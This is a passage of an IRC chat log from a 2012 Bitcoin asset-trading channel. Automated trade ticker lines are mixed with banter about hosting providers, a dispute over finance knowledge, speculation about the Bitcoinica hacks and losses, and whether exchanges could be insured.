BitVPS Sep 04 23:58:11 http://browsershots.org/screenshots/64f1bc22d6d0a33c6f7dad7fb9f2a247 some loaded tho Sep 04 23:58:15 ofcourse Sep 04 23:58:20 it looks like browsershots was ovreloaded Sep 04 23:58:23 o you suppose it fucked up cause of ip/dns name ? Sep 04 23:58:25 api.browsershots.org to be exact Sep 04 23:58:31 they all say Sep 04 23:58:35 'contacted api.browsershots.. waiting' Sep 04 23:58:37 [GLBSE] [FUTUREFUND] 18 @ 0.000124 = 0.0022 BTC [-] Sep 04 23:58:43 hm Sep 04 23:58:52 run it again Sep 04 23:58:54 i bet they'll all work Sep 04 23:59:03 well you run it, what, just put the url in Sep 04 23:59:24 you do ti Sep 04 23:59:28 no u Sep 04 23:59:29 :D Sep 04 23:59:29 im about to eat lunch Sep 04 23:59:35 nefario can do it. Sep 04 23:59:36 and i have a bunchof shit to do Sep 04 23:59:55 good site to test sites with anyway. Sep 05 00:00:21 Why u no use SingleHop in chicago? Sep 05 00:00:35 i do Sep 05 00:00:40 Chicago is full Sep 05 00:00:41 I like SingleHop =/ Sep 05 00:00:45 i havent put any new clients on chicago in months Sep 05 00:00:51 we have like 3 other awesome nodes Sep 05 00:00:57 switzerland is SO fucking popular Sep 05 00:01:03 definitely a good move, on my part, cause i rule Sep 05 00:01:16 gonna get another node in switzerland soon Sep 05 00:01:19 probably this month Sep 05 00:01:29 ok Sep 05 00:01:31 afk for few hrs Sep 05 00:01:36 i kinda like singlehop too Sep 05 00:01:48 for like us gaming and stuff it's pretty well placed Sep 05 00:01:57 Why switzerland? Because of the financial laws? Sep 05 00:02:19 admin@aklab-mx960> request system reboot Sep 05 00:02:19 error: could not open database: /var/run/db/juniper.db: Too many open files in system Sep 05 00:02:24 doh, sorry Sep 05 00:02:27 [MPEX] [F.GIGA.ETF] 4800 @ 0.00084715 = 4.0663 BTC [+] Sep 05 00:02:55 [GLBSE] [BAKEWELL] 1 @ 0.15 BTC [+] Sep 05 00:03:06 BTC-Mining i think they're right in the middle of the german ring Sep 05 00:03:11 great peering all through Sep 05 00:03:41 Eh, I guess Sep 05 00:04:35 i dunno who trusts their "financial privacy" anymore anyway Sep 05 00:05:54 [MPEX] [S.MPOE] 22000 @ 0.00040147 = 8.8323 BTC [+] Sep 05 00:06:30 [MPEX] [S.DICE] 15000 @ 0.0034 = 51 BTC [+] Sep 05 00:07:57 [MPEX] [F.GIGA.ETF] 7700 @ 0.00084715 = 6.5231 BTC [+] Sep 05 00:07:58 [MPEX] [F.GIGA.ETF] 15331 @ 0.00082643 = 12.67 BTC [-] Sep 05 00:08:00 [MPEX] [F.GIGA.ETF] 2000 @ 0.0007984 = 1.5968 BTC [-] Sep 05 00:08:01 [MPEX] [F.GIGA.ETF] 1100 @ 0.00076437 = 0.8408 BTC [-] Sep 05 00:08:02 [MPEX] [F.GIGA.ETF] 22185 @ 0.00076166 = 16.8974 BTC [-] Sep 05 00:08:03 [MPEX] [F.GIGA.ETF] 11500 @ 0.0007597 = 8.7366 BTC [-] Sep 05 00:08:03 [MPEX] [F.GIGA.ETF] 20876 @ 0.00075129 = 15.6839 BTC [-] Sep 05 00:08:05 [MPEX] [F.GIGA.ETF] 9308 @ 0.00074879 = 6.9697 BTC [-] Sep 05 00:09:57 [GLBSE] [JLP-BMD] 1 @ 0.095 BTC [+] Sep 05 00:09:59 [GLBSE] [JLP-BMD] 9 @ 0.09999 = 0.8999 BTC [+] Sep 05 00:10:08 [MPEX] [F.GIGA.ETF] 8292 @ 0.00074879 = 6.209 BTC [-] Sep 05 00:10:09 [MPEX] [F.GIGA.ETF] 2000 @ 0.00074567 = 1.4913 BTC [-] Sep 05 00:10:10 [MPEX] [F.GIGA.ETF] 19708 @ 0.00073557 = 14.4966 BTC [-] Sep 05 00:10:11 http://stochastically.com -- quotes, dividends, and more! Sep 05 00:12:22 da fuck is that. like a riemann ? Sep 05 00:12:39 LOL Sep 05 00:12:41 http://en.wikipedia.org/wiki/It%C5%8D_calculus Sep 05 00:12:54 [06:12:20] da fuck is that. like a riemann ? Sep 05 00:12:57 priceless Sep 05 00:13:20 what's so priceless about it ? Sep 05 00:13:36 You keep saying how much you know about finance and how little the people who disagree with you do Sep 05 00:13:44 dude, i'm not a quant. Sep 05 00:14:04 What exactly is your finance background? Sep 05 00:14:22 trading. Sep 05 00:14:38 here is usagi's finance background http://i.imgur.com/bpKwU.gif Sep 05 00:14:41 for instance, when they made the first large romanian brokerage house, way back in the 90s Sep 05 00:14:43 Yeah well see this is what I am talking about. Sep 05 00:14:56 Have you actually studied finance at all? Sep 05 00:15:04 they went through customer roosters and picked people to hire to train as brokers. Sep 05 00:15:12 they picked me, but i couldn't go, cause i was 17. Sep 05 00:15:59 dragostea din tei Sep 05 00:16:06 ahah wut ? Sep 05 00:16:09 Well I can't say I'm suprised Sep 05 00:16:19 Everyone here is a trader mircea that isn't something special Sep 05 00:16:29 sigh. Sep 05 00:16:41 everyone on the internet is a dog Sep 05 00:16:51 when they're done being an astronaut and Casanova. Sep 05 00:17:01 everyone on the internet is a pornstar Sep 05 00:17:17 Actually it is interesting that you mention quants, I wonder if any of the bots around here have any good math inside them Sep 05 00:17:40 no, they have bad math. Sep 05 00:17:42 tis satanic. Sep 05 00:18:01 Oh wow dub that really does look like me too! Sep 05 00:18:19 2+1 = maybe yes Sep 05 00:18:24 you guys are still going at it :) wtf! Sep 05 00:18:33 yawn... Sep 05 00:18:42 EskimoBob: see what u are missing out on... Sep 05 00:18:59 so let's cut this fish then. usagi, pick a couple of stochastic processes of your choosing and demonstrate ito calculus. Sep 05 00:18:59 I wish I could list porn on my resume Sep 05 00:19:07 naaah... I do not care Sep 05 00:19:09 you have one hour. do something that's not available to c/p online. Sep 05 00:19:10 lol Sep 05 00:19:15 child porn? Sep 05 00:19:19 [MPEX] [S.MPOE] 29400 @ 0.00040132 = 11.7988 BTC [-] Sep 05 00:19:27 You don't even know what that means, mircea Sep 05 00:19:36 dude, never mind me. you have one hour./ Sep 05 00:19:41 don't fritter it away. Sep 05 00:19:43 How about no Sep 05 00:19:46 this is your one chance to impress the adults. Sep 05 00:19:53 No wait, let's make this interesting Sep 05 00:19:58 http://quant.stackexchange.com/ Sep 05 00:19:58 I'll bet you $1000 Sep 05 00:20:03 right now mircea Sep 05 00:20:05 yes or no Sep 05 00:20:14 bet me 100o that waht ? Sep 05 00:20:19 Right now yes or now. Sep 05 00:20:22 lol Sep 05 00:20:25 aw shit. Sep 05 00:20:28 flip dat coin Sep 05 00:20:30 ;;coin Sep 05 00:20:31 heads Sep 05 00:20:33 :D Sep 05 00:20:57 [GLBSE] [OBSI.HRPT] 2 @ 0.1021 = 0.2042 BTC [+] Sep 05 00:21:03 [GLBSE] [TYGRR.BOND-P] 50 @ 0.099998 = 4.9999 BTC [+] Sep 05 00:21:07 so basically what happened here is that copumpkin said something, usagi googled, found wikipedia and now thinks he knows ito calculus. and he'll bet me. Sep 05 00:21:14 Ok yeah back to work I guess... Sep 05 00:21:17 this reminds me vaguely of that thing that failed, what was it called... Sep 05 00:21:23 the one on reddit. Sep 05 00:21:26 That thing called mircea has no balls Sep 05 00:21:32 kek Sep 05 00:21:36 mircea_popescu: /r/jailbait? Sep 05 00:21:40 nono, Sep 05 00:21:50 heliocentrism? Sep 05 00:21:53 /r/reddit.com ? Sep 05 00:21:55 the "company" that was doing something or the other and peopleended up logging in as anyone etc Sep 05 00:22:12 lemme dig. Sep 05 00:22:42 digg :) Sep 05 00:22:56 bitdaytrade Sep 05 00:23:28 "We do use... that thing... the one you just talked about. Right. We totally use that. You know, the one from... the market. The thing market." Sep 05 00:23:32 http://www.reddit.com/r/Bitcoin/comments/ybaut/do_not_invest_in_bitdaytrade_this_website_is/ Sep 05 00:23:40 this is about the level of it tbh. Sep 05 00:23:54 [GLBSE] [OBSI.HRPT] 10 @ 0.1021 = 1.021 BTC [+] Sep 05 00:24:02 oh that Sep 05 00:24:07 yeah. that ito thing. Sep 05 00:24:10 with the good math. Sep 05 00:24:21 speaking of finance and math Sep 05 00:24:31 https://class.coursera.org/compfinance-2012-001 Sep 05 00:24:51 coursera, i've heard talk about that site Sep 05 00:25:14 [GLBSE] [KRAKEN] 50 @ 0.00999999 = 0.5 BTC [+] Sep 05 00:25:19 copumpkin is that a good site? Sep 05 00:25:31 Will it teach me how to align this motherf***** buy button? https://hotwallet.ca/xc/orderbook.php Sep 05 00:25:34 why don't they put the teachers' names up front ? Sep 05 00:25:35 usagi: it's just a general site for running online courses, but the course is starting today Sep 05 00:25:40 and it's a prof from UW Sep 05 00:25:44 o ? Sep 05 00:25:48 so it sounds fairly legit Sep 05 00:25:55 it's one of those free online courses Sep 05 00:25:55 online courses have come a long way Sep 05 00:26:44 i was told this was a channel concerning bitcoin assets? Sep 05 00:26:53 Lyspooner: it's a pissing contest, really Sep 05 00:26:58 http://quant.stackexchange.com/questions/1490/why-would-an-investor-trade-a-variance-swap-over-a-volatility-swap Sep 05 00:27:00 i like that one. Sep 05 00:27:14 Lyspooner well there's the assbot dumping quotes Sep 05 00:27:21 and then the people discuss vaguely related matters. Sep 05 00:27:31 ok cool Sep 05 00:27:33 Lyspooner: what asset would you like to talk about? Sep 05 00:27:41 lol Sep 05 00:28:05 damn, i was just going to route him to the assbot wiki page Sep 05 00:28:37 there's also skiena's comp finance course Sep 05 00:28:40 if people like this kind of stuff Sep 05 00:28:42 it's all about price discovery Sep 05 00:28:51 i kinda like copumpkin cause he tries to be constructive. Sep 05 00:28:55 once you know what something is worth... you can have conviction in your trade Sep 05 00:29:03 [GLBSE] [GIGAMINING] 3 @ 0.7899 = 2.3697 BTC [+] Sep 05 00:29:11 http://www.cs.sunysb.edu/~skiena/691/ is the one, and it has lecture notes, slides, and videos! Sep 05 00:29:17 and you can hear skiena say "mmkay" every two words Sep 05 00:29:27 for about 20 hours Sep 05 00:29:44 (I'm not kidding, it's like the dude in south park) Sep 05 00:30:11 \o\ Sep 05 00:30:27 lol Sep 05 00:30:41 i dun think i'm cool enough yet copumpkin. i rarely know what things are worth Sep 05 00:30:45 and when i do it's usually 0. Sep 05 00:30:47 [GLBSE] [OBSI.HRPT] 5 @ 0.1021 = 0.5105 BTC [+] Sep 05 00:30:54 my time is worth $0 :( Sep 05 00:31:06 always suspected you had self-worth issues Sep 05 00:31:06 usagi: aha, now we know your financial qualifications! Sep 05 00:31:19 usagi: isn't there that dude in a top hat? is he your financial mentor? Sep 05 00:31:28 he was called milord in the italian dubbed version Sep 05 00:31:39 alice in wonderland rip-offs ? Sep 05 00:32:07 https://www.youtube.com/watch?v=cEqhXdFyrzQ Sep 05 00:32:12 that dude Sep 05 00:32:30 [GLBSE] [NYAN.C] 1 @ 0.75 BTC [+] Sep 05 00:32:31 I quite like that quant stack exchange though Sep 05 00:32:35 Endymion....... Sep 05 00:32:35 more people should use it Sep 05 00:32:43 lol Sep 05 00:32:48 that sounds more badass Sep 05 00:32:52 I never watched it in english or japanese Sep 05 00:32:53 [GLBSE] [OBSI.HRPT] 2 @ 0.1021 = 0.2042 BTC [+] Sep 05 00:32:55 That's his name Sep 05 00:33:15 you know what I love? Sep 05 00:33:27 Kamen Rider? Sep 05 00:33:32 when people take an obscure math concept, read for about two minutes, and then write a long blog post explaining it, completely wrong Sep 05 00:33:35 from the first sentence Sep 05 00:33:48 Where Sep 05 00:33:49 I appreciate people trying to learn and people trying to teach Sep 05 00:33:51 [GLBSE] [ASICMINER] 8 @ 0.137 = 1.096 BTC [+] Sep 05 00:33:53 [GLBSE] [ASICMINER] 1 @ 0.1375 BTC [+] Sep 05 00:34:04 http://haskell-web.blogspot.com.es/2012/07/from-monads-to-monoids-in-small.html Sep 05 00:34:22 Haskell is really good for parsing. Sep 05 00:34:25 there's so much wrong with that page Sep 05 00:34:32 I feel bad Sep 05 00:34:33 getting back to things of import : so wright has ~4 days to pay up 150k usd ? Sep 05 00:34:34 Too bad it's so operator heavy. Sep 05 00:34:43 mircea_popescu: it's more like 350k now Sep 05 00:34:46 o Sep 05 00:35:43 35,000 bitcoins :/ Sep 05 00:35:52 pfft Sep 05 00:35:55 peanuts! Sep 05 00:36:01 bye bye dcoa Sep 05 00:36:15 [GLBSE] [BFLS.RIG] 1 @ 1 BTC [+] Sep 05 00:36:17 [GLBSE] [BFLS.RIG] 1 @ 1.09 BTC [+] Sep 05 00:36:20 or whatever it's called Sep 05 00:36:26 zero credibility Sep 05 00:36:31 what's dcoa ? Sep 05 00:36:50 Well it's a big secret but it won't be if he doesn't pay Sep 05 00:37:37 http://www.google.com/search?q=dcoa+bitcoin <<< Sep 05 00:37:39 conspiracy Sep 05 00:37:50 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 05 00:39:16 [GLBSE] [OBSI.HRPT] 10 @ 0.1021 = 1.021 BTC [+] Sep 05 00:39:29 Well it's hardly a secret, I mean it isn't like they don't have a website. Sep 05 00:39:40 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 05 00:39:44 big secret hardly a secret ? pick one. Sep 05 00:41:37 Digital Currency ... Sep 05 00:41:54 of alabama ? Sep 05 00:41:58 winner Sep 05 00:42:02 You guys keep spoiling my jokes on mircea lol Sep 05 00:42:34 Hey bubba - you know that there 'nernet thingie Sep 05 00:42:53 its coming to alabamer Sep 05 00:43:20 I lived there for 4 years - allows me certain liberties to disparage it =) Sep 05 00:43:31 i lived there for about a week Sep 05 00:43:40 but tbh i kinda liked the place so. Sep 05 00:43:53 [GLBSE] [ASICMINER] 5 @ 0.1375 = 0.6875 BTC [+] Sep 05 00:44:06 [GLBSE] [BAKEWELL] 2 @ 0.15 = 0.3 BTC [+] Sep 05 00:44:14 http://www.reddit.com/r/Bitcoin/comments/yc6rf/we_demand_a_public_apology_from_uthezenpadguy/ im just re-reading all this. Sep 05 00:45:05 yeah i sold all bdt from nyan.b 3 weeks ago Sep 05 00:45:45 [GLBSE] [ASICMINER] 5 @ 0.1389 = 0.6945 BTC [+] Sep 05 00:47:40 [GLBSE] [ASICMINER] 10 @ 0.13889 = 1.3889 BTC [-] Sep 05 00:47:55 http://www.reddit.com/r/Bitcoin/comments/ybaut/do_not_invest_in_bitdaytrade_this_website_is/ Sep 05 00:50:28 [GLBSE] [TYGRR.BOND-P] 10 @ 0.099999 = 1 BTC [+] Sep 05 00:51:24 [GLBSE] [FDBF] 5 @ 0.14999999 = 0.75 BTC [+] Sep 05 00:53:56 !ticker FDBF Sep 05 00:54:02 http://titleofmagazine.com/wp-content/uploads/2010/05/i-therefore-pronounce-him-a-coward-scoundrel-william-tradewell-general-read.jpg Sep 05 00:54:04 [GLBSE:FDBF] [Bid: 0.149] [Ask: 0.14999999] [Spread: 0.00099999] [Last: 0.14999999] [24hVol: 30.14999799] [7dAvg: 0.14824659] Sep 05 00:54:09 [GLBSE] [ASICMINER] 1 @ 0.13889 BTC [-] Sep 05 01:00:26 [GLBSE] [MU] 1 @ 0.39 BTC [-] Sep 05 01:00:28 [MPEX] [S.MPOE] 8600 @ 0.00040147 = 3.4526 BTC [+] Sep 05 01:02:46 [GLBSE] [BIB.PIRATE] 10 @ 0.095 = 0.95 BTC [+] Sep 05 01:04:08 http://dcao.org/?page_id=36 Sep 05 01:04:08 !pl PPT.A 1 Sep 05 01:04:08 Requesting data from GLBSE (might take a while). Sep 05 01:04:13 No dividend payments yet. Sep 05 01:04:16 aww! Sep 05 01:04:18 !pl PPT.D 1 Sep 05 01:04:18 Requesting data from GLBSE (might take a while). Sep 05 01:04:20 No dividend payments yet. Sep 05 01:04:23 tsk tsk. Sep 05 01:04:26 its like a roll call at a special school Sep 05 01:04:54 wtf os that ;/ Sep 05 01:05:19 including some of the brightest minds and most passionate voices in the Bitcoin world. Sep 05 01:05:22 thats DCAO Sep 05 01:05:22 bejeebuz. Sep 05 01:05:49 In September of 2011 an interesting concept was presented in the DCAO minutes to increase accessibility of digital commodities through mobile payment processors. Sep 05 01:05:52 i take it it's long dead. Sep 05 01:06:11 ELLET Sep 05 01:06:23 Founded in July 2010, the Organization has already played a major role in the development of cutting-edge financial services and promotional campaigns Sep 05 01:06:24 lmao Sep 05 01:06:32 let me guess, mybitwallet and bitcoinica. Sep 05 01:07:22 anything matthew touches is going to fail Sep 05 01:07:40 if history's any guide... Sep 05 01:08:05 I'm half expecting some high drama suicide attempt or somethign once he loses this bet Sep 05 01:08:11 he appears quite manic about it Sep 05 01:08:25 im looking forward to it. maybe he misses. Sep 05 01:08:36 I honestly hope he succeeds Sep 05 01:08:39 [GLBSE] [OBSI.HRPT] 14 @ 0.1021 = 1.4294 BTC [+] Sep 05 01:08:55 there are some people we are just better off without Sep 05 01:08:56 well if he was going to miss and misses... Sep 05 01:09:26 sadly I suspect there will just be a show Sep 05 01:11:12 im sure we'll read all about it in that magazine thingamajig Sep 05 01:11:43 doubt it Sep 05 01:11:51 "I read and dismissed Ayn Rand in the late 1970's. She codified and packaged selfishness and boorishness in such a nice way that it resonated with selfish boors." Sep 05 01:11:53 what's a boor ? Sep 05 01:12:23 [MPEX] [S.MPOE] 9800 @ 0.00040147 = 3.9344 BTC [+] Sep 05 01:12:24 [MPEX] [S.MPOE] 2600 @ 0.00040186 = 1.0448 BTC [+] Sep 05 01:12:56 some1 from south afica wt a gun Sep 05 01:13:06 thats boer Sep 05 01:13:27 da da da Sep 05 01:13:44 they made good sausage Sep 05 01:13:56 http://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Boerewors_raw.jpg/250px-Boerewors_raw.jpg Sep 05 01:14:06 moo Sep 05 01:14:20 their chief guy, kruger (for whom the kugerrand is named) actually believed the earth is flat. Sep 05 01:15:15 [GLBSE] [FUTUREFUND] 5 @ 0.000124 = 0.0006 BTC [-] Sep 05 01:16:43 [MPEX] [S.DICE] 1000 @ 0.0034 = 3.4 BTC [+] Sep 05 01:17:33 [GLBSE] [OBSI.HRPT] 3 @ 0.1021 = 0.3063 BTC [+] Sep 05 01:23:55 Speaking of that, Zhou I wanted your thoughts on the financial situation. Sep 05 01:23:55 As you know, Bitcoinica went from cranking out 6-figure profit one month to Sep 05 01:23:55 a flatline the next. I covered most of the deficit from the hack on the Sep 05 01:23:55 assumption Bitcoinica profits would quickly fill in the rest. What's Sep 05 01:23:55 happened instead is a consistent equity leak that has remained unresolved Sep 05 01:23:55 for two months. We've gone from being short 40k to now being short 88k. Sep 05 01:23:57 [MPEX] [S.MPOE] 22628 @ 0.00040186 = 9.0933 BTC [+] Sep 05 01:23:58 [MPEX] [S.MPOE] 12072 @ 0.00040302 = 4.8653 BTC [+] Sep 05 01:24:08 this is why i was saying im not so sure the zhoutong friend story is true. Sep 05 01:24:14 maybe the guy just got his own money back. Sep 05 01:26:13 [GLBSE] [FPGAMINING] 5 @ 0.7211 = 3.6055 BTC [-] Sep 05 01:26:15 [GLBSE] [FPGAMINING] 9 @ 0.721 = 6.489 BTC [-] Sep 05 01:26:16 [GLBSE] [FPGAMINING] 4 @ 0.72000001 = 2.88 BTC [-] Sep 05 01:26:17 [GLBSE] [FPGAMINING] 12 @ 0.72 = 8.64 BTC [-] Sep 05 01:28:30 [GLBSE] [BITNODES] 1 @ 0.24475 BTC [-] Sep 05 01:30:25 [GLBSE] [PUREMINING] 10 @ 0.0957 = 0.957 BTC [+] Sep 05 01:31:36 so Tihan took it? Sep 05 01:31:54 more conspiracy for nefario Sep 05 01:33:13 dub i have no ideea, i was just saying why i have my doubts. Sep 05 01:33:47 its exactly the kind of stupidly transparent lie chinese tell Sep 05 01:34:07 which ? Sep 05 01:34:52 "some guy I know and did business with, who also uses my old email address sometimes, took the money. BUT he is willing to give it back if I ask him nicely" Sep 05 01:35:07 a a that. yeah. Sep 05 01:35:27 nevertheless, the truth may be "this guy i know with money who put up the deficit 4 months ago and now just took his own money back Sep 05 01:35:39 might be whined into giving some more money for fear of X Y Z" Sep 05 01:35:54 why would zhou lie for tihan though? Sep 05 01:36:06 how'd he be lieing for tihan ? Sep 05 01:36:12 let me put this out plainly : Sep 05 01:36:21 remember he only came up with this story after trying to cash out the same amount that was taken from mtgox and some other exchange Sep 05 01:36:29 1. zhou wrote a shit algorithm for hedging. it seemed good-enouggh originally, but then started losing money. Sep 05 01:36:37 2. the site was hacked, the vps thing. Sep 05 01:36:37 and being outed by magicaltux Sep 05 01:36:51 3. zhou went to rich chinese guy, bla bla bla'd him about the future of currency, got 50k btc Sep 05 01:37:04 on the deal that he'll pay it back with interest from the bitcoinica proceeds. Sep 05 01:37:08 4. no bitcoinica proceeds. Sep 05 01:37:13 5. guy takes his 50k btc back Sep 05 01:37:14 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 05 01:37:18 6. zhou claims "hack". Sep 05 01:37:26 7, zhou explains it was his friend bla bla bla. Sep 05 01:37:27 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [-] Sep 05 01:37:38 8. zhou goes to tihan, whines and bitches, threatens him with the spirits of cryptoancestors Sep 05 01:37:43 you are missing another hack or two, but yeah, could have run athat way Sep 05 01:37:46 9. tihan throws him 10k btc to get out of this mess Sep 05 01:37:55 ya i am, im trying to not run out of fingers here. Sep 05 01:39:15 and yes, that mtgox cashing thing is also dubious. Sep 05 01:40:11 [GLBSE] [CIUCIU.MINING] 20 @ 0.0999 = 1.998 BTC [+] Sep 05 01:42:16 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 05 01:42:30 [GLBSE] [OBSI.ABMO] 6 @ 0.087 = 0.522 BTC [+] Sep 05 01:44:37 [GLBSE] [CC] 1 @ 0.0001 BTC Sep 05 01:46:40 [GLBSE] [MOVETO.FUND] 3 @ 1.1301 = 3.3903 BTC [-] Sep 05 02:00:54 [GLBSE] [BIB.PIRATE] 10 @ 0.095 = 0.95 BTC [+] Sep 05 02:01:21 [GLBSE] [BIB.PIRATE] 20 @ 0.0975 = 1.95 BTC [+] Sep 05 02:01:35 [GLBSE] [BIB.PIRATE] 35 @ 0.1 = 3.5 BTC [+] Sep 05 02:02:18 [GLBSE] [FOO.PPPPT] 25 @ 0.1 = 2.5 BTC [+] Sep 05 02:03:38 [GLBSE] [OBSI.HRPT] 5 @ 0.1021 = 0.5105 BTC [+] Sep 05 02:04:55 the bitfloor drama is fascinating. Sep 05 02:06:29 [GLBSE] [COGNITIVE] 3 @ 0.64 = 1.92 BTC [+] Sep 05 02:06:31 [GLBSE] [COGNITIVE] 3 @ 0.641 = 1.923 BTC [+] Sep 05 02:09:02 [MPEX] [S.MPOE] 800 @ 0.00040166 = 0.3213 BTC [-] Sep 05 02:11:09 [GLBSE] [NASTY] 3 @ 0.62869 = 1.8861 BTC [+] Sep 05 02:11:31 [GLBSE] [FDBF] 5 @ 0.14999999 = 0.75 BTC [+] Sep 05 02:11:55 [GLBSE] [ASICMINER] 50 @ 0.138889 = 6.9445 BTC [-] Sep 05 02:11:57 [GLBSE] [ASICMINER] 50 @ 0.1388899 = 6.9445 BTC [+] Sep 05 02:11:58 [GLBSE] [ASICMINER] 9 @ 0.13889 = 1.25 BTC [+] Sep 05 02:11:59 [GLBSE] [ASICMINER] 5 @ 0.1397 = 0.6985 BTC [+] Sep 05 02:12:01 [GLBSE] [ASICMINER] 20 @ 0.1398 = 2.796 BTC [+] Sep 05 02:12:02 [GLBSE] [ASICMINER] 20 @ 0.1399 = 2.798 BTC [+] Sep 05 02:12:03 [GLBSE] [ASICMINER] 21 @ 0.14 = 2.94 BTC [+] Sep 05 02:15:53 [GLBSE] [OBSI.HRPT] 1 @ 0.1021 BTC [+] Sep 05 02:16:49 [MPEX] [F.GIGA.ETF] 3284 @ 0.00085411 = 2.8049 BTC [+] Sep 05 02:16:51 [MPEX] [F.GIGA.ETF] 5200 @ 0.0008556 = 4.4491 BTC [+] Sep 05 02:18:52 [MPEX] [S.MPOE] 4900 @ 0.00040132 = 1.9665 BTC [-] Sep 05 02:18:53 [MPEX] [S.MPOE] 8600 @ 0.00039964 = 3.4369 BTC [-] Sep 05 02:20:52 [GLBSE] [FDBF] 5 @ 0.14999999 = 0.75 BTC [+] Sep 05 02:22:43 [GLBSE] [MOORE] 4 @ 0.5012 = 2.0048 BTC [+] Sep 05 02:22:45 [GLBSE] [MOORE] 4 @ 0.5011 = 2.0044 BTC [-] Sep 05 02:22:46 [GLBSE] [MOORE] 2 @ 0.501 = 1.002 BTC [-] Sep 05 02:22:47 [GLBSE] [MOORE] 10 @ 0.5 = 5 BTC [-] Sep 05 02:24:24 [GLBSE] [PUREMINING] 2 @ 0.09577 = 0.1915 BTC [+] Sep 05 02:26:15 Few questions: Sep 05 02:26:15 Where your servers VPS? Sep 05 02:26:20 from whois Sep 05 02:26:20 Name Servers: Sep 05 02:26:20 ns1.linode.com Sep 05 02:26:25 ahahahaha ok this is the best i ever ehard. Sep 05 02:26:31 people in btc ARE STILL USING LINODE ?! Sep 05 02:27:22 Apparently? Sep 05 02:27:50 [GLBSE] [MERGEDMINING] 9 @ 0.075 = 0.675 BTC [-] Sep 05 02:27:51 i tell you, thiis is better than tv. Sep 05 02:28:08 "Everyone else is using them in bitcoinland! They must be good!" Sep 05 02:28:19 i never used them Sep 05 02:28:36 Me neither Sep 05 02:28:55 to be fair linode is fine Sep 05 02:29:04 dub i would never use them now. Sep 05 02:29:07 they can't be fine. Sep 05 02:29:12 they had an employee go rogue, there is no protection from that Sep 05 02:29:24 i don't care. what i do is, i pick things and blacklist them. Sep 05 02:29:28 [GLBSE] [SS] 8 @ 1.65 = 13.2 BTC [-] Sep 05 02:29:28 and there's no recourse. Sep 05 02:29:33 the problem is people putting hot wallets on _VPSEN_ Sep 05 02:29:38 that is fucking retarded Sep 05 02:29:47 for sure. Sep 05 02:30:15 shit meeting Sep 05 02:30:32 [GLBSE] [PUREMINING] 2 @ 0.09300001 = 0.186 BTC [-] Sep 05 02:30:34 [GLBSE] [PUREMINING] 3 @ 0.093 = 0.279 BTC [-] Sep 05 02:30:35 [GLBSE] [PUREMINING] 43 @ 0.092705 = 3.9863 BTC [-] Sep 05 02:30:36 [GLBSE] [PUREMINING] 25 @ 0.092605 = 2.3151 BTC [-] Sep 05 02:30:37 [GLBSE] [PUREMINING] 2 @ 0.09260001 = 0.1852 BTC [-] Sep 05 02:30:38 [GLBSE] [PUREMINING] 32 @ 0.0925 = 2.96 BTC [-] Sep 05 02:36:48 also Sep 05 02:37:09 why arn't these exchanges audited and insured? Sep 05 02:37:34 by whom ? Sep 05 02:37:50 CPA! Sep 05 02:38:07 lol Sep 05 02:38:09 well, don't people like neofurter and rg do security work? Sep 05 02:38:27 smickles neither of those could eat a 25k loss. what else you got ? Sep 05 02:38:36 and if cpa is currently the only option for insureance, something may be able to be worked out Sep 05 02:38:55 cpa is the pet project of usagi, who is a well meaning and far overreaching anonymous english teacher. Sep 05 02:39:13 insurance means somfin else. Sep 05 02:39:24 mircea_popescu: it's a sector of the bitcoin economy that needs to be fleshed out, it seems Sep 05 02:39:38 well... yeah, but it'll take time. Sep 05 02:39:56 Someone should write a how-to security guide for all these exchanges to get up to speed. Sep 05 02:40:02 bunch of people have been throwing concepts around, just, insurance ain't so simple in btc. Sep 05 02:40:20 Obsi someone was linking something on the forum. the problem is everyone has faith in themselves Sep 05 02:40:29 this results in bizzare shortcuts and weird implementations. Sep 05 02:41:12 i would imagine it to work out something like: in order to qualify for insurance, the agent would require you system to meet with some sort of inspection Sep 05 02:41:30 and i bet the insurance would cost a pretty penny Sep 05 02:41:35 smickles option contracts are insurance, in a way. i don't even know currently if i got taken for 4.5k or not. Sep 05 02:41:50 leaving aside the fact that no actor in the "insurance" play=pretend space could eat that and survive, Sep 05 02:41:53 what would you do ? Sep 05 02:42:03 [GLBSE] [FDBF] 5 @ 0.14999999 = 0.75 BTC [+] Sep 05 02:42:17 what would i do for what? Sep 05 02:42:30 if you were in my shoes. you insured the btc/usd rate and took a loss. what now ? Sep 05 02:43:08 [GLBSE] [OBSI.HRPT] 400 @ 0.1021 = 40.84 BTC [+] Sep 05 02:43:15 well, you take a loss. presumeably, you business can handle an amount of losses Sep 05 02:43:25 right. this is not how insurance works. Sep 05 02:43:29 insurance finds the culprit and sues. Sep 05 02:43:36 or w/e, [pur]sues them. Sep 05 02:43:46 so i want an answer to this q : do i need to pursue anyone or is it bona fide loss ? Sep 05 02:44:27 how does insurance work when it's for stuff like hail damage? Sep 05 02:44:34 no one to pursue there Sep 05 02:44:37 you have hail models Sep 05 02:44:42 yes, there is. you change the actuarial model. Sep 05 02:44:57 You sue the weather Sep 05 02:45:00 lol Sep 05 02:45:12 but seriously smickles, it's very VERY hard to insure anon. Sep 05 02:45:16 suppose you were insuring bitcoinica. Sep 05 02:45:22 linode hack, you pay. Sep 05 02:45:26 new hack, do you pay ? Sep 05 02:45:31 even newer hack, pay still ? Sep 05 02:45:41 well, if i insured an exchange, i wouldn't allow it to be on a managed vps Sep 05 02:45:42 soon enough best scammer business model would revolve around your insurance company. Sep 05 02:45:43 [MPEX] [F.GIGA.ETF] 4800 @ 0.00085578 = 4.1077 BTC [+] Sep 05 02:46:09 even irl, w/o anonimity insurance fraud is like the #1 fraud by volume tried in courts. Sep 05 02:46:46 it's easy with hail, cause nobody can hail. Sep 05 02:46:53 but your claims would result almost always from "hacks". Sep 05 02:48:18 mircea_popescu: in your case, isn't all actual btc offline? Sep 05 02:48:19 and actually, to this day us insurers won't do floods. Sep 05 02:48:23 smickles yes. Sep 05 02:48:42 so then a theft would have to come from physical theft Sep 05 02:49:28 except im not an exchange. are you going to only insure exchanges that don't have hot wallets ? Sep 05 02:49:41 it could be a start Sep 05 02:49:45 insurance company should provide the hosting & app platform, then they can be sure if actual hacking is taking place. Sep 05 02:49:57 Obsi this is a good point. Sep 05 02:50:10 Obsi: in a way Sep 05 02:50:13 but the 